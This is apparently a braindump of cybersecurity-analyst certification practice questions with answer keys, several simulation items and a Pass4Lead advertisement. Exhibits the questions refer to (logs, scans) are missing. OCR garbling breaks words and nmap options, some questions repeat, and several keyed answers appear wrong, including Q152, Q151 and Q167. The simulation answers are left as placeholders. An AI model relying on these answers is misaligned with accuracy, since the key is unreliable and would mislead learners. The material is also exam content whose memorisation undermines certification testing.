QUESTION 149
Which of the following policies would slate an employee should not disable security safeguards, such as
host firewalls and antivirus on company systems?

A. Code of conduct policy

B. Account management policy
C. Password policy
D. Acceptable use policy

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 150
After a breach involving the exfiltration of a large amount of sensitive data a security analyst is reviewing
the following firewall logs to determine how the breach occurred:
Which of the following IP addresses does the analyst need to investigate further?

A. 192.168.1.1
B. 192.168.1.10
C. 192.168.1.12
D. 192.168.1.193

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 151
The help desk noticed a security analyst that emails from a new email server are not being sent out. The
new email server was recently to the existing ones. The analyst runs the following command on the new
server.

nslookup -type=txt exampledomain.org

"v=spf1 ip4:72.56.48.0/28 -all"
...

Given the output, which of the following should the security analyst check NEXT?

A. The DNS name of the new email server

B. The version of SPF that is being used
C. The IP address of the new email server
D. The DMARC policy

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 152
A web-based front end for a business intelligence application uses pass-through authentication to
authenticate users The application then uses a service account, to perform queries and look up data m a
database A security analyst discovers employees are accessing data sets they have not been authorized
to use. Which of the following will fix the cause of the issue?

A. Change the security model to force the users to access the database as themselves
B. Parameterize queries to prevent unauthorized SQL queries against the database
C. Configure database security logging using syslog or a SIEM
D. Enforce unique session IDs so users do not get a reused session ID

Correct Answer: B
Explanation

Explanation/Reference:
QUESTION 153
A security analyst has been alerted to several emails that snow evidence an employee is planning
malicious activities that involve employee Pll on the network before leaving the organization. The security
analysis BEST response would be to coordinate with the legal department and:

A. the public relations department

B. senior leadership
C. law enforcement
D. the human resources department

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 154
An information security analyst is working with a data owner to identify the appropriate controls to preserve
the confidentiality of data within an enterprise environment One of the primary concerns is exfiltration of
data by malicious insiders Which of the following controls is the MOST appropriate to mitigate risks?

A. Data deduplication
B. OS fingerprinting
C. Digital watermarking
D. Data loss prevention

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 155
A security analyst is attempting to utilize the blowing threat intelligence for developing detection
capabilities:

In which of the following phases is this APT MOST likely to leave discoverable artifacts?

A. Data collection/exfiltration
B. Defensive evasion
C. Lateral movement
D. Reconnaissance

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 156
Which of me following BEST articulates the benefit of leveraging SCAP in an organization's cybersecurity
analysis toolset?

A. It automatically performs remedial configuration changes lo enterprise security services

B. It enables standard checklist and vulnerability analysis expressions for automaton
C. It establishes a continuous integration environment for software development operations
D. It provides validation of suspected system vulnerabilities through workflow orchestration

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 157
A security analyst needs to assess the web server versions on a list of hosts to determine which are
running a vulnerable version of the software and output that list into an XML file named Webserverlist. Xml.
The host list is provided in a file named werbserverlist,text. Which of the fallowing Nmap commands would
BEST accomplish this goal?

A. nmap 璱L webserverlist.txt 璼C 璸 443 璷X webserverlist.xml

B. nmap 璱L webserverlist.txt 璼V 璸 443 璷X webserverlist.xml
C. nmap 璱L webserverlist.txt 璅 璸 443 璷X webserverlist.xml
D. nmap ?takefile webserverlist.txt 璷utputfile XML webserverlist.xml 璼canports 443

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 158
An organization developed a comprehensive modern response policy Executive management approved
the policy and its associated procedures. Which of the following activities would be MOST beneficial to
evaluate personnel's familiarity with incident response procedures?

A. A simulated breach scenario evolving the incident response team

B. Completion of annual information security awareness training by ail employees
C. Tabtetop activities involving business continuity team members
D. Completion of lessons-learned documentation by the computer security incident response team
E. External and internal penetration testing by a third party

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 159
While preparing of an audit of information security controls in the environment an analyst outlines a
framework control that has the following requirements:
1. All sensitive data must be classified
2. All sensitive data must be purged on a quarterly basis
3. Certificates of disposal must remain on file for at least three years

This framework control is MOST likely classified as:

A. prescriptive
B. risk-based
C. preventive
D. corrective

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 160
A team of security analysis has been alerted to potential malware activity. The initial examination indicates
one of the affected workstations on beaconing on TCP port 80 to five IP addresses and attempting to
spread across the network over port 445. Which of the following should be the team's NEXT step during
the detection phase of this response process?

A. Escalate the incident to management ,who will then engage the network infrastructure team to keep
them informed
B. Depending on system critically remove each affected device from the network by disabling wired and
wireless connections
C. Engage the engineering team to block SMB traffic internally and outbound HTTP traffic to the five IP
addresses Identify potentially affected systems by creating a correlation
D. Identify potentially affected system by creating a correlation search in the SIEM based on the network
traffic.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 161
Which of the following technologies can be used to store digital certificates and is typically used in high-
security implementations where integrity is paramount?

A. HSM
B. eFuse
C. UEFI
D. Self-encrypting drive

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 162
A security analyst is conducting a post-incident log analysis to determine which indicators can be used to
detect further occurrences of a data exfiltration incident. The analyst determines backups were not
performed during this time and reviews the following:
Which of the following should the analyst review to find out how the data was exfilltrated?

A. Monday's logs
B. Tuesday's logs
C. Wednesday's logs
D. Thursday's logs

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 163
An organization has not had an incident for several month. The Chief information Security Officer (CISO)
wants to move to proactive stance for security investigations. Which of the following would BEST meet that
goal?

A. Root-cause analysis
B. Active response
C. Advanced antivirus
D. Information-sharing community
E. Threat hunting

Correct Answer: E
Explanation

Explanation/Reference:

QUESTION 164
A company wants to establish a threat-hunting team. Which of the following BEST describes the rationale
for integration intelligence into hunt operations?

A. It enables the team to prioritize the focus area and tactics within the company's environment.
B. It provide critically analyses for key enterprise servers and services.
C. It allow analysis to receive updates on newly discovered software vulnerabilities.
D. It supports rapid response and recovery during and followed an incident.
Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 165
After receiving reports latency, a security analyst performs an Nmap scan and observes the following
output:

Which of the following suggests the system that produced output was compromised?

A. Secure shell is operating of compromise on this system.

B. There are no indicators of compromise on this system.
C. MySQL services is identified on a standard PostgreSQL port.
D. Standard HTP is open on the system and should be closed.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 166
A security analyst discovers a vulnerability on an unpatched web server that is used for testing machine
learning on Bing Data sets. Exploitation of the vulnerability could cost the organization $1.5 million in lost
productivity. The server is located on an isolated network segment that has a 5% chance of being
compromised. Which of the following is the value of this risk?

A. $75.000
B. $300.000
C. $1.425 million
D. $1.5 million

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 167
The help desk provided a security analyst with a screenshot of a user's desktop:
For which of the following is aircrack-ng being used?

A. Wireless access point discovery

B. Rainbow attack
C. Brute-force attack
D. PCAP data collection

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 168
When attempting to do a stealth scan against a system that does not respond to ping, which of the
following Nmap commands BEST accomplishes that goal?

A. nmap -sA -O <system> -noping

B. nmap -sT -O <system> -P0
C. nmap -sS -O <system> -P0
D. nmap -sQ -O <system> -P0

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 169
A team of security analysts has been alerted to potential malware activity. The initial examination indicates
one of the affected workstations is beaconing on TCP port 80 to five IP addresses and attempting to
spread across the network over port 445. Which of the following should be the team's NEXT step during
the detection phase of this response process?

A. Escalate the incident to management, who will then engage the network infrastructure team to keep
them informed.
B. Depending on system criticality, remove each affected device from the network by disabling wired and
wireless connections.
C. Engage the engineering team to block SMB traffic internally and outbound HTTP traffic to the five IP
addresses.
D. Identify potentially affected systems by creating a correlation search in the SIEM based on the network
traffic.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 170
A hybrid control is one that:
A. is implemented differently on individual systems
B. is implemented at the enterprise and system levels
C. has operational and technical components
D. authenticates using passwords and hardware tokens

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 171
A cybersecurity analyst is supporting an incident response effort via threat intelligence. Which of the
following is the analyst MOST likely executing?

A. Requirements analysis and collection planning

B. Containment and eradication
C. Recovery and post-incident review
D. Indicator enrichment and research pivoting

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 172
The inability to do remote updates of certificates, keys, software, and firmware is a security issue
commonly associated with:

A. web servers on private networks

B. HVAC control systems
C. smartphones
D. firewalls and UTM devices

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 173
Which of the following BEST articulates the benefit of leveraging SCAP in an organization's cybersecurity
analysis toolset?

A. It automatically performs remedial configuration changes to enterprise security services

B. It enables standard checklist and vulnerability analysis expressions for automation
C. It establishes a continuous integration environment for software development operations
D. It provides validation of suspected system vulnerabilities through workflow orchestration

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 174
Which of the following software assessment methods would be BEST for gathering data related to an
application's availability during peak times?

A. Security regression testing

B. Stress testing
C. Static analysis testing
D. Dynamic analysis testing
E. User acceptance testing

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 175
An organization has not had an incident for several months. The Chief Information Security Officer (CISO)
wants to move to a more proactive stance for security investigations. Which of the following would BEST
meet that goal?

A. Root-cause analysis
B. Active response
C. Advanced antivirus
D. Information-sharing community
E. Threat hunting

Correct Answer: E
Explanation

Explanation/Reference:

QUESTION 176
An organization developed a comprehensive incident response policy. Executive management approved
the policy and its associated procedures. Which of the following activities would be MOST beneficial to
evaluate personnel's familiarity with incident response procedures?

A. A simulated breach scenario involving the incident response team

B. Completion of annual information security awareness training by all employees
C. Tabletop activities involving business continuity team members
D. Completion of lessons-learned documentation by the computer security incident response team
E. External and internal penetration testing by a third party

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 177
A cybersecurity analyst is responding to an incident. The company's leadership team wants to attribute the
incident to an attack group. Which of the following models would BEST apply to the situation?

A. Intelligence cycle
B. Diamond Model of Intrusion Analysis
C. Kill chain
D. MITRE ATT&CK

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 178
Which of the following will allow different cloud instances to share various types of data with a minimal
amount of complexity?

A. Reverse engineering
B. Application log collectors
C. Workflow orchestration
D. API integration
E. Scripting

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 179
An analyst performs a routine scan of a host using Nmap and receives the following output:

Which of the following should the analyst investigate FIRST?

A. Port 21
B. Port 22
C. Port 23
D. Port 80

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 180
Which of the following is the MOST important objective of a post-incident review?

A. Capture lessons learned and improve incident response processes

B. Develop a process for containment and continue improvement efforts
C. Identify new technologies and strategies to remediate
D. Identify a new management strategy

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 181
An organization was alerted to a possible compromise after its proprietary data was found for sale on the
Internet. An analyst is reviewing the logs from the next-generation UTM in an attempt to find evidence of
this breach. Given the following output:

Which of the following should be the focus of the investigation?

A. webserver.org-dmz.org
B. sftp.org-dmz.org
C. 83hht23.org-int.org
D. ftps.bluemed.net

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 182
A security analyst is reviewing the following log entries to identify anomalous activity:

Which of the following attack types is occurring?

A. Directory traversal
B. SQL injection
C. Buffer overflow
D. Cross-site scripting

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 183
A company's Chief Information Security Officer (CISO) is concerned about the integrity of some highly
confidential files. Any changes to these files must be tied back to a specific authorized user's activity
session.
Which of the following is the BEST technique to address the CISO's concerns?

A. Configure DLP to reject all changes to the files without pre-authorization. Monitor the files for
unauthorized changes.
B. Regularly use SHA-256 to hash the directory containing the sensitive information. Monitor the files for
unauthorized changes.
C. Place a legal hold on the files. Require authorized users to abide by a strict time context access
policy.Monitor the files for unauthorized changes.
D. Use Wireshark to scan all traffic to and from the directory. Monitor the files for unauthorized changes.

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 1
SIMULATION

You are a cybersecurity analyst tasked with interpreting scan data from Company A's servers. You must
verify the requirements are being met for all of the servers and recommend changes if you find they are
not.
The company's hardening guidelines indicate the following:
1. TLS 1.2 is the only version of TLS running.
2. Apache 2.4.18 or greater should be used.
3. Only default ports should be used.

INSTRUCTIONS
Using the supplied data, record the status of compliance with the company's guidelines for each server.
The question contains two parts: make sure you complete Part 1 and Part 2. Make recommendations for
issues based ONLY on the hardening guidelines provided.
A. Check the explanation below.
B. PlaceHolder
C. PlaceHolder
D. PlaceHolder

Correct Answer: A
Explanation

Explanation/Reference:
Part 1 Answer:

AppServ1 is only using TLS.1.2

AppServ4 is only using TLS.1.2
AppServ1 is using Apache 2.4.18 or greater
AppServ3 is using Apache 2.4.18 or greater
AppServ4 is using Apache 2.4.18 or greater

Part 2 answer:
Recommendation:
Recommendation is to disable TLS v1.1 on AppServ2 and AppServ3. Also upgrade AppServ2 Apache to
version 2.4.48 from its current version of 2.3.48

QUESTION 2
SIMULATION

Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the desk ticket
queue.

INSTRUCTIONS
Click on me ticket to see the ticket details Additional content is available on tabs within the ticket First,
select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from
second drop-down menu
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button
A. Check the explanation below.
B. PlaceHolder
C. PlaceHolder
D. PlaceHolder

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 3
SIMULATION

Approximately 100 employees at your company have received a phishing email. As a security analyst you
have been tasked with handling this situation.

INSTRUCTIONS

Review the information provided and determine the following:

1. How many employees clicked on the link in the phishing email?
2. On how many workstations was the malware installed?
3. What is the executable file name or the malware?
A. Check the explanation below.
B. PlaceHolder
C. PlaceHolder
D. PlaceHolder

Correct Answer: A
Explanation

Explanation/Reference:
Select the following answer as per diagram below:
About Pass4Lead.com
As a professional IT exam study guide provider, Pass4Lead.com provides our
candidates with the most accurate and high quality IT exam training material.

Cisco Citrix CompTIA Check Point

EMC EXIN HP Juniper
LPI Nortel Oracle VMware

and so on, you can find all kinds of exam questions, study guides, practice tests here.
Our aim is to be your assistance on your way to be successful in your IT certifications.
We provide our customers with the 100% Pass Guaranteed or Full Refund.

We spare no efforts to help you to pass any IT Certification exams at the first try.
Do not hesitate to contact us if you need any help on the products, payments or
questions about IT exams.

You can reach us on:

https://www.Pass4Lead.com/contact-us.html

We will get in touch with you in 24 hours. You satisfactory is the recognition for us.
You could rely upon us anytime you need help. We are at your service.

Guarantee & Policy | Privacy & Policy | Terms & Conditions

Any charges made through this site will appear as Global Simulators Limited.
All trademarks are the property of their respective owners.

Copyright © Pass4Lead.com, All Rights Reserved.